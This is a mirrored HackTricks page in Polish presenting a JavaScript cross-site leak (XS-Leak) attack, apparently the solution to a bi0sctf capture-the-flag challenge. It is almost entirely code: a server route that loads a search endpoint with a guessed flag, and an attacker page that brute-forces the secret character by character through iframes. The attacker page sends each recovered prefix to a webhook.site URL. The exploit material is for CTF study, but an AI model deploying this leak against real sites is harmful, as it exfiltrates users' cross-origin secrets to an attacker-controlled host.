mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-12 21:28:55 +00:00
95 lines
3.7 KiB
Markdown
95 lines
3.7 KiB
Markdown
|
# Wykonanie JavaScript XS Leak
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się sztuczkami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
```javascript
|
||
|
// Code that will try ${guess} as flag (need rest of the server code
|
||
|
app.get('/guessing', function(req, res) {
|
||
|
let guess = req.query.guess
|
||
|
let page = `<html>
|
||
|
<head>
|
||
|
<script>
|
||
|
function foo() {
|
||
|
// If not the flag this will be executed
|
||
|
window.parent.foo()
|
||
|
}
|
||
|
</script>
|
||
|
<script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
|
||
|
</head>
|
||
|
<p>hello2</p>
|
||
|
</html>`
|
||
|
res.send(page)
|
||
|
});
|
||
|
```
|
||
|
Strona główna, która generuje iframe'y do poprzedniej strony `/guessing`, aby przetestować każdą możliwość
|
||
|
```html
|
||
|
<html>
|
||
|
<head>
|
||
|
<script>
|
||
|
let candidateIsGood = false;
|
||
|
let candidate = ''
|
||
|
let flag = 'bi0sctf{'
|
||
|
let guessIndex = -1
|
||
|
|
||
|
let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
|
||
|
|
||
|
// this will get called from our iframe IF the candidate is WRONG
|
||
|
function foo() {
|
||
|
candidateIsGood = false
|
||
|
}
|
||
|
|
||
|
timerId = setInterval(() => {
|
||
|
if (candidateIsGood) {
|
||
|
flag = candidate
|
||
|
guessIndex = -1
|
||
|
fetch('https://webhook.site/<yours-goes-here>?flag='+flag)
|
||
|
}
|
||
|
|
||
|
//Start with true and will be change to false if wrong
|
||
|
candidateIsGood = true
|
||
|
guessIndex++
|
||
|
if (guessIndex >= flagChars.length) {
|
||
|
fetch('https://webhook.site/<yours-goes-here>')
|
||
|
return
|
||
|
}
|
||
|
let guess = flagChars[guessIndex]
|
||
|
candidate = flag + guess
|
||
|
let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>`
|
||
|
console.log('iframe: ', iframe)
|
||
|
hack.innerHTML = iframe
|
||
|
}
|
||
|
, 500);
|
||
|
</script>
|
||
|
</head>
|
||
|
<p>hello</p>
|
||
|
<div id="hack">
|
||
|
</div>
|
||
|
</html>
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|